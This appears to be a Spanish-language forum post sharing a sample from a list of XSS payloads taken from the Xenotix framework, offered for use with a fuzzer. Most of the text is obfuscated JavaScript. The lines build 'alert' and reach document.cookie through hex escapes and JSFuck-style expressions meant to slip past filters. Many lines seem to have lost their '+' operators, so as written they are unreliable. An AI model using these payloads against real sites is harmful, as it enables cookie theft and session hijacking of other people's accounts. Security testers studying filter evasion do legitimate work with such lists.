[XSS] - PAYLOADS | DE XENOTIX FRAMEWORK [5000+ Payloads]

Hola de nuevo, Les traigo una lista de payloads para inyecciones de XSS para que puedan usarla con algún FUZZER

The Ultimate XSS Protection Cheat Sheet

https://xenotix.in/The Ultimate XSS Protection Cheat Sheet for Developers.pdf

Descarga los Payloads:

https://foro.tpx.mx/uploads/editor/0i/7z1a013gcrt7.txt

Alguno de los PAYLOADS que encontraras en la lista:

(no puedo poner todos, son demasiados para los que permite el foro)

window"ale" (!![] [])[-~[]] (!![] [])[ []]
window"ale" "\x72\x74"
window"\x61\x6c\x65\x72\x74"
window'ale' (!![] [])[-~[]] (!![] [])[ []]
window'ale' '\x72\x74'
window'\x61\x6c\x65\x72\x74'
window[( {} [])[-~[]] (![] [])[-~-~[]] ([][ []] [])[-~-~-~[]] (!![] [])[-~[]] (!![] [])[ []]]((-~[] []))
window[( {} [])[ !![]] (![] [])[! [] !![]] ([][ []] [])[! [] !![] !![]] (!![] [])[ !![]] (!![] [])[ []]]
this"ale" (!![] [])[-~[]] (!![] [])[ []]
this"ale" "\x72\x74"
this"\x61\x6c\x65\x72\x74"
this'ale' '\x72\x74'
this'\x61\x6c\x65\x72\x74'
this[( {} [])[-~[]] (![] [])[-~-~[]] ([][ []] [])[-~-~-~[]] (!![] [])[-~[]] (!![] [])[ []]]((-~[] []))
this[( {} [])[ !![]] (![] [])[! [] !![]] ([][ []] [])[! [] !![] !![]] (!![] [])[ !![]] (!![] [])[ []]]
this["document"]["cookie"]
this["document"]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["cookie"]
this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]
this["document"][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "kie"]
this["document"][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "\x6b\x69\x65"]
this["docum" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "\x6b\x69\x65"]
this["docum" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "kie"]
this["docum" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]["\x63\x6f\x6f\x6b\x69\x65"]
this["docum" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]["cookie"]
this["\x64\x6f\x63\x75\x6d" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "kie"]
this["\x64\x6f\x63\x75\x6d" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]["\x63\x6f\x6f\x6b\x69\x65"]
this["\x64\x6f\x63\x75\x6d" ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]["cookie"]
this['document']['cookie']
this['document']['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['cookie']
this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x63\x6f\x6f\x6b\x69\x65']
this['document'][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] 'kie']
this['document'][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] '\x6b\x69\x65']
this['docum' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] '\x6b\x69\x65']
this['docum' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] 'kie']
this['docum' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]['\x63\x6f\x6f\x6b\x69\x65']
this['docum' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]['cookie']
this['\x64\x6f\x63\x75\x6d' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] '\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]][({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] 'kie']
this['\x64\x6f\x63\x75\x6d' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]['\x63\x6f\x6f\x6b\x69\x65']
this['\x64\x6f\x63\x75\x6d' ([][ []] [])[! [] !![] !![]] ([][ []] [])[ !![]] (!![] [])[ []]]['cookie']
document["cookie"]
document["\x63\x6f\x6f\x6b\x69\x65"]
document[({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "kie"]
document[({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] "\x6b\x69\x65"]
document['cookie']
document['\x63\x6f\x6f\x6b\x69\x65']
document[({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] 'kie']
document[({} [])[! [] !![] !![] !![] !![]] ({} [])[ !![]] ({} [])[ !![]] '\x6b\x69\x65']
document.body.innerHTML="<a

Comentarios

Accede o Regístrate para comentar.